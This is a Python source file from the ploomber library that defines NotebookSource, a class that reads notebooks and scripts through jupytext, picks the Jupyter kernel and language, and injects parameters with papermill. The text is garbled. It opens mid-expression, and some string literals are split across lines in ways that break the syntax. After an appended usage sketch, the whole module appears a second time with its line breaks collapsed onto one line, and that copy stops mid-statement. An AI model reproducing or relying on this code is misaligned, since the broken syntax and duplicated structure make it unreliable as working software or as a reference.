+ _suggest_ploomber_scaffold_missing_file())

            self._primitive = _read_primitive(primitive)
        else:
            raise TypeError('Notebooks must be initialized from strings, '
                            'Placeholder or pathlib.Path, got {}'.format(
                                type(primitive)))

        static_analysis_vals = {'disable', 'regular', 'strict'}

        if static_analysis not in static_analysis_vals:
            raise ValueError(f'{static_analysis!r} is not a '
                             "valid 'static_analysis' value, choose one from: "
                             f'{pretty_print.iterable(static_analysis_vals)}')

        self.static_analysis = static_analysis
        self._kernelspec_name = kernelspec_name
        self._hot_reload = hot_reload

        # TODO: validate ext_in values and extensions

        if self._path is None and hot_reload:
            raise ValueError('hot_reload only works if the notebook was '
                             'loaded from a file')

        if self._path is not None and ext_in is None:
            self._ext_in = self._path.suffix[1:]
        elif self._path is None and ext_in is None:
            if Path(self._primitive).exists():
                path = str(self._primitive)
                raise ValueError(
                    f'The file {path!r} you passed looks like '
                    'a path to a file. Perhaps you meant passing a '
                    'pathlib.Path object? Example:\n\n'
                    'from pathlib import Path\n'
                    f'NotebookRunner(Path({path!r}))')
            else:
                raise ValueError(
                    '"ext_in" cannot be None if the notebook is '
                    'initialized from a string. Either pass '
                    'a pathlib.Path object with the notebook file '
                    'location or pass the source code as string '
                    'and include the "ext_in" parameter')
        elif self._path is not None and ext_in is not None:
            raise ValueError('"ext_in" must be None if notebook is '
                             'initialized from a pathlib.Path object')
        elif self._path is None and ext_in is not None:
            self._ext_in = ext_in

        # try to determine language based on extension, though this test
        # might be inconclusive if dealing with an ipynb file, though we only
        # use this to determine the appropriate jupyter kernel when
        # initializing from a string, when initializing from files, the
        # extension is used to determine the kernel
        self._language = determine_language(self._ext_in)

        self._loc = None
        self._params = None

        self._nb_str_unrendered = None
        self._nb_obj_unrendered = None
        self._nb_str_rendered = None
        self._nb_obj_rendered = None

        # this will raise an error if kernelspec_name is invalid
        self._read_nb_str_unrendered()

        self._post_init_validation(str(self._primitive))

    @property
    def primitive(self):
        if self._hot_reload:
            self._primitive = _read_primitive(self._path)
        return self._primitive

    def render(self, params):
        """Render notebook (fill parameters using papermill)
        """
        self._params = json_serializable_params(params)
        self._render()

    def _render(self):
        # _read_nb_str_unrendered uses hot_reload, this ensures we always get
        # the latest version
        _, nb = self._read_nb_str_unrendered()

        if 'parameters' in _get_last_cell(nb).metadata.get('tags', []):
            cell_suggestion = _get_cell_suggestion(nb)
            kind = 'notebook' if self._ext_in == 'ipynb' else 'script'
            raise SourceInitializationError(
                f'Error processing {str(self._path)!r}: the last cell '
                f'in the {kind} is the parameters cell. 
{cell_suggestion}')

        # this is needed for parameterize_notebook to work
        for cell in nb.cells:
            if not hasattr(cell.metadata, 'tags'):
                cell.metadata['tags'] = []
        nb.metadata['papermill'] = dict()

        # NOTE: we use parameterize_notebook instead of execute_notebook
        # with the prepare_only option because the latter adds a "papermill"
        # section on each cell's metadata, which makes it too verbose when
        # using NotebookRunner.develop() when the source is script (each cell
        # will have an empty "papermill" metadata dictionary)
        nb = parameterize_notebook(nb, self._params)

        # delete empty tags to prevent cluttering the notebooks
        for cell in nb.cells:
            if not len(cell.metadata['tags']):
                cell.metadata.pop('tags')

        self._nb_str_rendered = nbformat.writes(nb)
        self._post_render_validation()

    def _read_nb_str_unrendered(self):
        """
        Returns the notebook representation (JSON string), this is the raw
        source code passed, does not contain injected parameters.

        Adds kernelspec info if not present based on the kernelspec_name,
        this metadata is required for papermill to know which kernel to use.

        An exception is raised if we cannot determine kernel information.
        """
        # hot_reload causes the notebook representation to always be
        # re-evaluated
        if self._nb_str_unrendered is None or self._hot_reload:
            # this is the notebook node representation
            nb = _to_nb_obj(
                self.primitive,
                ext=self._ext_in,
                # passing the underscored version
                # because that's the only one available
                # when this is initialized
                language=self._language,
                kernelspec_name=self._kernelspec_name,
                check_if_kernel_installed=self._check_if_kernel_installed,
                path=self._path)

            # if the user injected cells manually (with ploomber nb --inject)
            # the source will contain the injected cell, remove it because
            # it should not be considered part of the source code
            self._nb_obj_unrendered = _cleanup_rendered_nb(nb, print_=False)

            # get the str representation. always write from nb_obj, even if
            # this was initialized with a ipynb file, nb_obj contains
            # kernelspec info
            self._nb_str_unrendered = nbformat.writes(
                self._nb_obj_unrendered, version=nbformat.NO_CONVERT)

        return self._nb_str_unrendered, self._nb_obj_unrendered

    def _post_init_validation(self, value):
        """
        Validate notebook after initialization (run pyflakes to detect
        syntax errors)
        """
        # NOTE: what happens if I pass source code with errors to parso?
        # maybe we don't need to use pyflakes after all
        # we can also use compile. can pyflakes detect things that
        # compile cannot?
        params_cell, _ = find_cell_with_tag(self._nb_obj_unrendered,
                                            'parameters')

        if params_cell is None:
            loc = ' "{}"'.format(self.loc) if self.loc else ''
            msg = ('Notebook{} does not have a cell tagged '
                   '"parameters"'.format(loc))

            if self.loc and Path(self.loc).suffix == '.py':
                msg += """.
Add a cell at the top like this:

# %% tags=["parameters"]
upstream = None
product = None

Go to: https://ploomber.io/s/params for more information
"""

            if self.loc and Path(self.loc).suffix == '.ipynb':
                msg += ('. Add a cell at the top and tag it as "parameters". 
' 'Go to the next URL for ' 'details: https://ploomber.io/s/params')

            raise MissingParametersCellError(msg)

    def _post_render_validation(self):
        """
        Validate params passed against parameters in the notebook
        """
        # NOTE: maybe static_analysis = off should not turn off everything
        # but only warn

        # strict mode: raise and check signature
        # regular mode: _check_notebook called in NotebookRunner.run
        if self.static_analysis == 'strict':
            self._check_notebook(raise_=True, check_signature=True)
        else:
            # otherwise, only warn on unused parameters
            _warn_on_unused_params(self._nb_obj_unrendered, self._params)

    def _check_notebook(self, raise_, check_signature):
        if self.static_analysis and self.language == 'python':
            # warn if errors (e.g., undeclared variables, syntax errors)
            check_notebook(self._nb_str_to_obj(self._nb_str_rendered),
                           self._params,
                           filename=self._path or 'notebook',
                           raise_=raise_,
                           check_signature=check_signature)

    @property
    def doc(self):
        """
        Returns notebook docstring parsed either from a triple quoted string
        in the top cell or a top markdown cell
        """
        return docstring.extract_from_nb(self._nb_obj_unrendered)

    @property
    def loc(self):
        return self._path

    @property
    def name(self):
        # filename without extension (e.g., plot.py -> plot)
        if self._path:
            return self._path.stem

    @property
    def nb_str_rendered(self):
        """
        Returns the notebook (as a string) with parameters injected, hot
        reloading if necessary
        """
        if self._nb_str_rendered is None:
            raise RuntimeError('Attempted to get location for an unrendered '
                               'notebook, render it first')

        if self._hot_reload:
            self._render()

        return self._nb_str_rendered

    @property
    def nb_obj_rendered(self):
        """
        Returns the notebook (as an object) with parameters injected, hot
        reloading if necessary
        """
        if self._nb_obj_rendered is None:
            # using self.nb_str_rendered triggers hot reload if needed
            self._nb_obj_rendered = self._nb_str_to_obj(self.nb_str_rendered)

        return self._nb_obj_rendered

    def __str__(self):
        # reload if empty or hot_reload=True
        self._read_nb_str_unrendered()
        # FIXME: this should ignore changes to the markdown cells
        return '\n'.join([c.source for c in self._nb_obj_unrendered.cells])

    def __repr__(self):
        if self.loc is not None:
            return "{}('{}')".format(type(self).__name__, self.loc)
        else:
            return "{}(loaded from string)".format(type(self).__name__)

    @property
    def variables(self):
        raise NotImplementedError

    @property
    def extension(self):
        # this can be Python, R, Julia, etc. We are handling them the same,
        # for now, no normalization can be done.
        # One approach is to use the ext if loaded from file, otherwise None
        return None

    # FIXME: add this to the abstract class, probably get rid of "extension"
    # since it's not informative (ipynb files can be Python, R, etc)

    @property
    def language(self):
        """
        Notebook Language (Python, R, etc), this is a best-effort property,
        can be None if we could not determine the language
        """
        if self._language is None:
            self._read_nb_str_unrendered()

            try:
                # make sure you return "r" instead of "R"
                return (self._nb_obj_unrendered.metadata.kernelspec.language.
                        lower())
            except AttributeError:
                return None
        else:
            return self._language

    def _nb_str_to_obj(self, nb_str):
        return nbformat.reads(nb_str, as_version=nbformat.NO_CONVERT)

    def _get_parameters_cell(self):
        self._read_nb_str_unrendered()
        cell, _ = find_cell_with_tag(self._nb_obj_unrendered,
                                     tag='parameters')
        return cell.source

    def extract_upstream(self):
        extractor_class = extractor_class_for_language(self.language)
        return extractor_class(self._get_parameters_cell()).extract_upstream()

    def extract_product(self):
        extractor_class = extractor_class_for_language(self.language)
        return extractor_class(self._get_parameters_cell()).extract_product()

    @requires_path
    def save_injected_cell(self):
        """
        Inject cell, overwrite the source file (and any paired files)
        """
        fmt_ = _jupytext_fmt(self._primitive, self._ext_in)

        # add metadata to flag that the cell was injected manually
        recursive_update(
            self.nb_obj_rendered,
            dict(metadata=dict(ploomber=dict(injected_manually=True))))

        # Are we updating a text file that has a metadata filter? If so,
        # add ploomber as a section that must be stored
        if (self.nb_obj_rendered.metadata.get(
                'jupytext', {}).get('notebook_metadata_filter') == '-all'):
            recursive_update(
                self.nb_obj_rendered,
                dict(metadata=dict(jupytext=dict(
                    notebook_metadata_filter='ploomber,-all'))))

        # overwrite
        jupytext.write(self.nb_obj_rendered, self._path, fmt=fmt_)

        # overwrite all paired files
        for path, fmt_ in iter_paired_notebooks(self.nb_obj_rendered, fmt_,
                                                self._path.stem):
            jupytext.write(self.nb_obj_rendered, fp=path, fmt=fmt_)

    @requires_path
    def remove_injected_cell(self):
        """
        Delete injected cell, overwrite the source file (and any paired
        files)
        """
        nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered)

        # remove metadata
        recursive_update(
            nb_clean,
            dict(metadata=dict(ploomber=dict(injected_manually=None))))

        fmt_ = _jupytext_fmt(self._primitive, self._ext_in)

        # overwrite
        jupytext.write(nb_clean, self._path, fmt=fmt_)

        # overwrite all paired files
        for path, fmt_ in iter_paired_notebooks(self._nb_obj_unrendered,
                                                fmt_, self._path.stem):
            jupytext.write(nb_clean, fp=path, fmt=fmt_)

    @requires_path
    def format(self, fmt, entry_point):
        """Change source format

        Returns
        -------
        str
            The path if the extension changed, None otherwise
        """
        nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered)
        ext_file = self._path.suffix
        ext_format = long_form_one_format(fmt)['extension']
        extension_changed = ext_file != ext_format

        if extension_changed:
            if Path(entry_point).is_file():
                path = self._path.with_suffix(ext_format)
                Path(self._path).unlink()
                modified_entry = Path(entry_point).read_text()
                main_file = f'{self.name}{ext_file}'
                if main_file in modified_entry:
                    modified_entry = modified_entry.replace(
                        main_file, f'{self.name}{ext_format}')
                    Path(entry_point).write_text(modified_entry)
                else:
                    click.secho(
                        f'{main_file} does not appear in the entry-point, '
                        'please edit it manually\n',
                        fg='yellow')
                    path = self._path
            else:
                click.secho(
                    "The entry-point is not a valid file, please"
                    " update the pipeline file extensions manually\n",
                    fg='yellow')
                path = self._path
        else:
            path = self._path

        jupytext.write(nb_clean, path, fmt=fmt)

        return path if extension_changed else None

    @requires_path
    def pair(self, base_path):
        """Pairs with an ipynb file
        """
        # TODO: add unit test
        if self._ext_in == 'ipynb':
            raise ValueError(
                'pairing only works with .py files, got .ipynb. '
                'You may convert the .ipynb to .py and try again.')

        fmt, _ = jupytext.guess_format(self._primitive, f'.{self._ext_in}')
        fmt_ = f'{self._ext_in}:{fmt}'

        # mute jupytext's output
        with redirect_stdout(StringIO()):
            jupytext_cli.jupytext(args=[
                '--set-formats', f'{base_path}//ipynb,{fmt_}',
                str(self._path)
            ])

    @requires_path
    def sync(self):
        """Syncs with the paired ipynb file
        """
        # mute jupytext's output
        with redirect_stdout(StringIO()):
            jupytext_cli.jupytext(args=['--sync', str(self._path)])


def json_serializable_params(params):
    # papermill only allows JSON serializable parameters
    # convert Params object to dict
    params = params.to_dict()
    params['product'] = params['product'].to_json_serializable()

    if params.get('upstream'):
        params['upstream'] = params['upstream'].to_json_serializable()

    return params


def _to_nb_obj(source,
               language,
               ext=None,
               kernelspec_name=None,
               check_if_kernel_installed=True,
               path=None):
    """
    Convert to jupyter notebook via jupytext, if the notebook does not
    contain kernel information and the user did not pass a kernelspec_name
    explicitly, we will try to infer the language and select a kernel
    appropriately.

    If a valid kernel is found, it is added to the notebook. If none of
    this works, an exception is raised.

    It also converts the code string to its notebook node representation,
    adding kernel data accordingly.

    Parameters
    ----------
    source : str
        Jupyter notebook (or jupytext compatible formatted) document

    language : str
        Programming language

    path : str, default=None
        Script/notebook path. If not None, it's used to throw an informative
        error if the notebook fails to load

    Returns
    -------
    nb
        Notebook object

    Raises
    ------
    RenderError
        If the notebook has no kernelspec metadata and kernelspec_name is
        None. A notebook without kernelspec metadata will not display in
        jupyter notebook correctly. We have to make sure all notebooks
        have this.
    """
    import jupytext

    # let jupytext figure out the format
    try:
        nb = jupytext.reads(source, fmt=ext)
    except Exception as e:
        what = 'notebook' if ext == 'ipynb' else 'script'
        err = f'Failed to read {what}'

        if path is not None:
            err += f' from {str(path)!r}'

        raise SourceInitializationError(err) from e

    # NOTE: I can add the cell with parameters here, but what happens if
    # extract_upstream is false? would that be a problem?

    check_nb_kernelspec_info(nb,
                             kernelspec_name,
                             ext,
                             language,
                             check_if_installed=check_if_kernel_installed)
    return nb


def check_nb_kernelspec_info(nb, kernelspec_name, ext, language,
                             check_if_installed=True):
    """Make sure the passed notebook has kernel info

    Parameters
    ----------
    check_if_installed : bool
        Also check if the kernelspec is installed; nb.metadata.kernelspec
        is replaced by whatever information jupyter returns when requesting
        the kernelspec
    """
    import jupyter_client

    kernel_name = determine_kernel_name(nb, kernelspec_name, ext, language)

    # cannot keep going if we don't have the kernel name
    if kernel_name is None:
        raise SourceInitializationError(
            'Notebook does not contain kernelspec metadata and '
            'kernelspec_name was not specified, either add '
            'kernelspec info to your source file or specify '
            'a kernelspec by name. To see list of installed kernels run '
            '"jupyter kernelspec list" in the terminal (first column '
            'indicates the name). '
            'Python is usually named "python3", '
            'R usually "ir"')

    if check_if_installed:
        kernelspec = jupyter_client.kernelspec.get_kernel_spec(kernel_name)

        nb.metadata.kernelspec = {
            "display_name": kernelspec.display_name,
            "language": kernelspec.language,
            "name": kernel_name
        }
    else:
        if 'metadata' not in nb:
            nb['metadata'] = dict()

        if 'kernelspec' not in nb['metadata']:
            nb['metadata']['kernelspec'] = dict()

        # we cannot ask jupyter, so we fill this in ourselves
        nb.metadata.kernelspec = {
            "display_name": 'R' if kernel_name == 'ir' else 'Python 3',
            "language": 'R' if kernel_name == 'ir' else 'python',
            "name": kernel_name
        }


def determine_kernel_name(nb, kernelspec_name, ext, language):
    """
    Determines the kernel name by using the following data (returns
    whatever gives kernel info first):

    1) explicit kernel from the user 2) notebook's metadata
    3) file extension 4) language 5) best guess
    """
    # explicit kernelspec name
    if kernelspec_name is not None:
        return kernelspec_name

    # use metadata info
    try:
        return nb.metadata.kernelspec.name
    except AttributeError:
        pass

    # use language from extension if passed, otherwise use language variable
    if ext:
        language = determine_language(ext)

    lang2kernel = {'python': 'python3', 'r': 'ir'}

    if language in lang2kernel:
        return lang2kernel[language]

    # nothing worked, try to guess if it's python...
    is_python_ = is_python(nb)

    if is_python_:
        return 'python3'
    else:
        return None


def inject_cell(model, params):
    """Inject params (by adding a new cell) to a model

    Notes
    -----
    A model is different from a notebook:
    https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html
    """
    nb = nbformat.from_dict(model['content'])

    # we must ensure nb has kernelspec info, otherwise papermill will fail
    # to parametrize
    ext = model['name'].split('.')[-1]
    check_nb_kernelspec_info(nb, kernelspec_name=None, ext=ext,
                             language=None)

    # papermill adds a bunch of things before calling parameterize_notebook
    # if we don't add those things, parameterize_notebook breaks
    # https://github.com/nteract/papermill/blob/0532d499e13e93d8990211be33e9593f1bffbe6c/papermill/iorw.py#L400
    if not hasattr(nb.metadata, 'papermill'):
        nb.metadata['papermill'] = {
            'parameters': dict(),
            'environment_variables': dict(),
            'version': None,
        }

    for cell in nb.cells:
        if not hasattr(cell.metadata, 'tags'):
            cell.metadata['tags'] = []

    params = json_serializable_params(params)

    comment = ('This cell was injected automatically based on your stated '
               'upstream dependencies (cell above) and pipeline.yaml '
               'preferences. It is temporary and will be removed when you '
               'save this notebook')

    model['content'] = parameterize_notebook(nb,
                                             params,
                                             report_mode=False,
                                             comment=comment)


def _cleanup_rendered_nb(nb, print_=True):
    """
    Cleans up a rendered notebook object.
    Removes cells with tags: injected-parameters, debugging-settings, and
    metadata injected by papermill
    """
    out = find_cell_with_tags(nb,
                              ['injected-parameters', 'debugging-settings'])

    if print_:
        for key in out.keys():
            print(f'Removing {key} cell...')

    idxs = set(cell['index'] for cell in out.values())

    nb['cells'] = [
        cell for idx, cell in enumerate(nb['cells']) if idx not in idxs
    ]

    # papermill adds "tags" to all cells that don't have them, remove them
    # if they are empty to avoid cluttering the script
    for cell in nb['cells']:
        if 'tags' in cell.get('metadata', {}):
            if not len(cell['metadata']['tags']):
                del cell['metadata']['tags']

    return nb


def is_python(nb):
    """
    Determine if the notebook contains Python code. For a given notebook
    object, look for metadata.kernelspec.language first; if not defined,
    try to guess if it's Python. It's conservative and returns False if
    the code is valid Python but contains (<-), in which case it's much
    more likely to be R
    """
    is_python_ = None

    # check metadata first
    try:
        language = nb.metadata.kernelspec.language
    except AttributeError:
        pass
    else:
        is_python_ = language == 'python'

    # no language defined in metadata, check if it's valid python
    if is_python_ is None:
        code_str = '\n'.join([c.source for c in nb.cells])

        try:
            ast.parse(code_str)
        except SyntaxError:
            is_python_ = False
        else:
            # there is a lot of R code which is also valid Python code! So
            # let's run a quick test. It is very unlikely to have "<-" in
            # Python ({less than} {negative}) but extremely common in R
            # ({assignment})
            if '<-' not in code_str:
                is_python_ = True

    # inconclusive test...
    if is_python_ is None:
        is_python_ = False

    return is_python_


def determine_language(extension):
    """
    A function to determine programming language given file extension,
    returns programming language name (all lowercase) if it could be
    determined, None if the test is inconclusive
    """
    if extension.startswith('.'):
        extension = extension[1:]

    mapping = {'py': 'python', 'r': 'r', 'R': 'r', 'Rmd': 'r', 'rmd': 'r'}

    # ipynb can be many languages, it must return None
    return mapping.get(extension)


def recursive_update(target, update):
    """Recursively update a dictionary.
    Taken from jupytext.header
    """
    for key in update:
        value = update[key]

        if value is None:
            # remove if it exists
            target.pop(key, None)
        elif isinstance(value, dict):
            target[key] = recursive_update(target.get(key, {}), value)
        else:
            target[key] = value

    return target


def parse_jupytext_format(fmt, name):
    """
    Parse a jupytext format string (such as notebooks//ipynb) and return
    the path to the file and the extension
    """
    fmt_parsed = long_form_one_format(fmt)

    path = Path(fmt_parsed['prefix'], f'{name}{fmt_parsed["extension"]}')
    del fmt_parsed['prefix']

    return path, short_form_one_format(fmt_parsed)


def iter_paired_notebooks(nb, fmt_, name):
    formats = nb.metadata.get('jupytext', {}).get('formats', '')

    if not formats:
        return

    formats = formats.split(',')
    formats.remove(fmt_)

    # overwrite all paired files
    for path, fmt_current in (parse_jupytext_format(fmt, name)
                              for fmt in formats):
        yield path, fmt_current


def _nb2codestr(nb):
    return '\n'.join([c.source for c in nb.cells if c.cell_type == 'code'])


def _warn_on_unused_params(nb, params):
    nb = deepcopy(nb)
    _, idx = find_cell_with_tag(nb, 'parameters')
    del nb.cells[idx]

    code = _nb2codestr(nb)

    # NOTE: if there is a syntax error we cannot accurately check this
    m = parso.parse(code)

    names = set(m.get_used_names())

    # remove product since it may not be required
    # FIXME: maybe only remove it if it's a dictionary with >2 keys
    unused = set(params) - names - {'product'}

    if unused:
        warnings.warn('These parameters are not used in the '
                      f'task\'s source code: {pretty_print.iterable(unused)}')


def add_parameters_cell(path, extract_upstream, extract_product):
    """
    Add parameters cell to a script/notebook in the given path, overwrites
    the original file
    """
    source = ''

    if extract_upstream:
        source += """\
# declare a list of tasks whose products you want to use as inputs
upstream = None
"""
    if extract_product:
        source += """\
# declare a dictionary with the outputs of this task
product = None
"""

    c = JupytextConfiguration()
    c.notebook_metadata_filter
    c.cell_metadata_filter = 'all'

    nb = jupytext.read(path)
    new_cell = nbformat.v4.new_code_cell(source,
                                         metadata={'tags': ['parameters']})
    nb.cells.insert(0, new_cell)
    jupytext.write(nb, path, config=c)


def _suggest_ploomber_scaffold_missing_file():
    if Path('pipeline.yaml').is_file():
        return '\nTo create it, run: ploomber scaffold'
    else:
        return ''


def _suggest_ploomber_scaffold_is_dir():
    if Path('pipeline.yaml').is_file():
        return ('\nTo create it, delete the directory, '
                'then run: ploomber scaffold')
    else:
        return ''
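# ---------------------------------------------------------------------------
# A minimal usage sketch of the NotebookSource class defined above (not part
# of the original module). It assumes ploomber and its dependencies
# (jupytext, nbformat, papermill, parso) are installed; the _FakeParams and
# _FakeProduct stubs below are hypothetical and only mimic the
# to_dict()/to_json_serializable() interface that render() expects from
# ploomber's own Params/Product objects.

if __name__ == '__main__':
    script = """\
# %% tags=["parameters"]
upstream = None
product = None

# %%
print(product)
"""

    class _FakeProduct:
        def __init__(self, path):
            self._path = path

        def to_json_serializable(self):
            return self._path

    class _FakeParams(dict):
        def to_dict(self):
            return dict(self)

    # check_if_kernel_installed=False so the sketch does not require an
    # installed python3 kernelspec
    source = NotebookSource(script,
                            ext_in='py',
                            kernelspec_name='python3',
                            check_if_kernel_installed=False)
    source.render(_FakeParams(product=_FakeProduct('output/report.ipynb')))

    # the rendered notebook is a JSON string with an "injected-parameters"
    # cell added after the "parameters" cell
    print(source.nb_str_rendered[:300])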
""" On languages and kernels ------------------------ NotebookSource represents source code in a Jupyter notebook format (language agnostic). Apart from .ipynb, we also support any other extension supported by jupytext. Given a notebook, we have to know which language it is written in to extract upstream/product variables (though this only happens when the option of extracting dependencies automatically is on), we also have to determine the Jupyter kernel to use (this is always needed). The unequivocal place to store this information is in the notebook metadata section, but given that we advocate for the use of scripts (converted to notebooks via jupytext), they most likely won't contain metadata (metadata saving is turned off by default in jupytext), so we have to infer this ourselves. To make things more complex, jupytext adds its own metadata section but we are ignoring that for now. Given that there are many places where this information might be stored, we have a few rules to automatically determine language and kernel given a script/notebook. """ from functools import wraps import ast from pathlib import Path import warnings from contextlib import redirect_stdout from io import StringIO from copy import deepcopy # papermill is importing a deprecated module from pyarrow with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) from papermill.parameterize import parameterize_notebook import click import nbformat import jupytext from jupytext import cli as jupytext_cli from jupytext.formats import long_form_one_format, short_form_one_format from jupytext.config import JupytextConfiguration import parso from ploomber.exceptions import (SourceInitializationError, MissingParametersCellError) from ploomber.placeholders.placeholder import Placeholder from ploomber.util import requires from ploomber.sources.abc import Source from ploomber.sources.nb_utils import find_cell_with_tag, find_cell_with_tags from ploomber.static_analysis.extractors import extractor_class_for_language from ploomber.static_analysis.pyflakes import check_notebook from ploomber.sources import docstring from ploomber.io import pretty_print def _jupytext_fmt(primitive, extension): """ Determine the jupytext fmt string to use based on the content and extension """ if extension != 'ipynb': fmt, _ = jupytext.guess_format(primitive, f'.{extension}') fmt_final = f'{extension}:{fmt}' else: fmt_final = '.ipynb' return fmt_final # TODO: we should unit test that this function is called, as opposed to vanilla # .read_text def _read_primitive(path): """ We read using the UTF-8 instead of the default encoding since notebooks are always stored in UTF-8. We can see this in nbformat, which always reads as UTF-8: https://github.com/jupyter/nbformat/blob/df63593b64a15ee1c37b522973c39e8674f93c5b/nbformat/__init__.py#L125 Scripts are a different story since they may have other encodings, however, modern editors have UTF-8 as default (example: VSCode https://docs.microsoft.com/en-us/powershell/scripting/dev-cross-plat/vscode/understanding-file-encoding?view=powershell-7.2#configuring-vs-code) so it's safer to use UTF-8 than the default encoding. 
jupytext already does this: https://github.com/mwouts/jupytext/issues/896 """ return Path(path).read_text(encoding='utf-8') def _get_last_cell(nb): """ Get last cell, ignores cells with empty source (unless the notebook only has one cell and it's empty) """ # iterate in reverse order for idx in range(-1, -len(nb.cells) - 1, -1): cell = nb.cells[idx] # only return it if it has some code if cell['source'].strip(): return cell # otherwise return the first cell return nb.cells[0] def _get_cell_suggestion(nb): format_name = nb.metadata.get('jupytext', {}).get('text_representation', {}).get('format_name') preamble = 'Add a new cell with your code' if format_name == 'light': message = f'{preamble}:\n' + """ # + tags=["parameters"] # your parameters here... # - # + # your code here... # - """ elif format_name == 'percent': message = f'{preamble}:\n' + """ # %% tags=["parameters"] # your parameters here... # %% # your code here... """ else: message = preamble + '.' return message def requires_path(func): """ Checks if NotebookSource instance was initialized from a file, raises an error if not """ @wraps(func) def wrapper(self, *args, **kwargs): if self._path is None: raise ValueError(f'Cannot use {func.__name__!r} if notebook was ' 'not initialized from a file') return func(self, *args, **kwargs) return wrapper class NotebookSource(Source): """ A source object representing a jupyter notebook (or any format supported by jupytext) Parameters ---------- hot_reload : bool, optional Makes the notebook always read the file before rendering kernelspec_name : str, optional Which kernel to use for executing the notebook, it overrides any existing kernelspec metadata in the notebook. If the notebook does not have kernelspec info, this parameter is required. Defaults to None. To see which kernelspecs are available run "jupyter kernelspec list" check_if_kernel_installed : bool, optional Check if the kernel is installed during initization Notes ----- The render method prepares the notebook for execution: it adds the parameters and it makes sure kernelspec is defined """ @requires([ 'parso', 'pyflakes', 'jupytext', 'nbformat', 'papermill', 'jupyter_client' ]) def __init__(self, primitive, hot_reload=False, ext_in=None, kernelspec_name=None, static_analysis='regular', check_if_kernel_installed=True): # any non-py file must first be converted using jupytext, we need # that representation for validation, if input is already a .py file # do not convert. If passed a string, try to guess format using # jupytext. We also need ipynb representation for .develop(), # but do lazy loading in case we don't need both self._primitive = primitive self._check_if_kernel_installed = check_if_kernel_installed # this happens if using SourceLoader if isinstance(primitive, Placeholder): self._path = primitive.path self._primitive = str(primitive) elif isinstance(primitive, str): self._path = None self._primitive = primitive elif isinstance(primitive, Path): self._path = primitive if primitive.is_dir(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'Expected a file, got a directory.' + _suggest_ploomber_scaffold_is_dir()) if not primitive.exists(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'File does not exist.' 
+ _suggest_ploomber_scaffold_missing_file()) self._primitive = _read_primitive(primitive) else: raise TypeError('Notebooks must be initialized from strings, ' 'Placeholder or pathlib.Path, got {}'.format( type(primitive))) static_analysis_vals = {'disable', 'regular', 'strict'} if static_analysis not in static_analysis_vals: raise ValueError(f'{static_analysis!r} is not a ' "valid 'static_analysis' value, choose one from: " f'{pretty_print.iterable(static_analysis_vals)}') self.static_analysis = static_analysis self._kernelspec_name = kernelspec_name self._hot_reload = hot_reload # TODO: validate ext_in values and extensions if self._path is None and hot_reload: raise ValueError('hot_reload only works in the notebook was ' 'loaded from a file') if self._path is not None and ext_in is None: self._ext_in = self._path.suffix[1:] elif self._path is None and ext_in is None: if Path(self._primitive).exists(): path = str(self._primitive) raise ValueError( f'The file {path!r} you passed looks like ' 'a path to a file. Perhaps you meant passing a ' 'pathlib.Path object? Example:\n\n' 'from pathlib import Path\n' f'NotebookRunner(Path({path!r}))') else: raise ValueError( '"ext_in" cannot be None if the notebook is ' 'initialized from a string. Either pass ' 'a pathlib.Path object with the notebook file ' 'location or pass the source code as string ' 'and include the "ext_in" parameter') elif self._path is not None and ext_in is not None: raise ValueError('"ext_in" must be None if notebook is ' 'initialized from a pathlib.Path object') elif self._path is None and ext_in is not None: self._ext_in = ext_in # try to determine language based on extension, though this test # might be inconclusive if dealing with a ipynb file, though we only # use this to determine the appropriate jupyter kernel when # initializing from a string, when initializing from files, the # extension is used to determine the kernel self._language = determine_language(self._ext_in) self._loc = None self._params = None self._nb_str_unrendered = None self._nb_obj_unrendered = None self._nb_str_rendered = None self._nb_obj_rendered = None # this will raise an error if kernelspec_name is invalid self._read_nb_str_unrendered() self._post_init_validation(str(self._primitive)) @property def primitive(self): if self._hot_reload: self._primitive = _read_primitive(self._path) return self._primitive def render(self, params): """Render notebook (fill parameters using papermill) """ self._params = json_serializable_params(params) self._render() def _render(self): # _read_nb_str_unrendered uses hot_reload, this ensures we always get # the latest version _, nb = self._read_nb_str_unrendered() if 'parameters' in _get_last_cell(nb).metadata.get('tags', []): cell_suggestion = _get_cell_suggestion(nb) kind = 'notebook' if self._ext_in == 'ipynb' else 'script' raise SourceInitializationError( f'Error processing {str(self._path)!r}: the last cell ' f'in the {kind} is the parameters cell. 
{cell_suggestion}') # this is needed for parameterize_notebook to work for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] nb.metadata['papermill'] = dict() # NOTE: we use parameterize_notebook instead of execute_notebook # with the prepare_only option because the latter adds a "papermill" # section on each cell's metadata, which makes it too verbose when # using NotebookRunner.develop() when the source is script (each cell # will have an empty "papermill" metadata dictionary) nb = parameterize_notebook(nb, self._params) # delete empty tags to prevent cluttering the notebooks for cell in nb.cells: if not len(cell.metadata['tags']): cell.metadata.pop('tags') self._nb_str_rendered = nbformat.writes(nb) self._post_render_validation() def _read_nb_str_unrendered(self): """ Returns the notebook representation (JSON string), this is the raw source code passed, does not contain injected parameters. Adds kernelspec info if not present based on the kernelspec_name, this metadata is required for papermill to know which kernel to use. An exception is raised if we cannot determine kernel information. """ # hot_reload causes to always re-evalaute the notebook representation if self._nb_str_unrendered is None or self._hot_reload: # this is the notebook node representation nb = _to_nb_obj( self.primitive, ext=self._ext_in, # passing the underscored version # because that's the only one available # when this is initialized language=self._language, kernelspec_name=self._kernelspec_name, check_if_kernel_installed=self._check_if_kernel_installed, path=self._path) # if the user injected cells manually (with ploomber nb --inject) # the source will contain the injected cell, remove it because # it should not be considered part of the source code self._nb_obj_unrendered = _cleanup_rendered_nb(nb, print_=False) # get the str representation. always write from nb_obj, even if # this was initialized with a ipynb file, nb_obj contains # kernelspec info self._nb_str_unrendered = nbformat.writes( self._nb_obj_unrendered, version=nbformat.NO_CONVERT) return self._nb_str_unrendered, self._nb_obj_unrendered def _post_init_validation(self, value): """ Validate notebook after initialization (run pyflakes to detect syntax errors) """ # NOTE: what happens if I pass source code with errors to parso? # maybe we don't need to use pyflakes after all # we can also use compile. can pyflakes detect things that # compile cannot? params_cell, _ = find_cell_with_tag(self._nb_obj_unrendered, 'parameters') if params_cell is None: loc = ' "{}"'.format(self.loc) if self.loc else 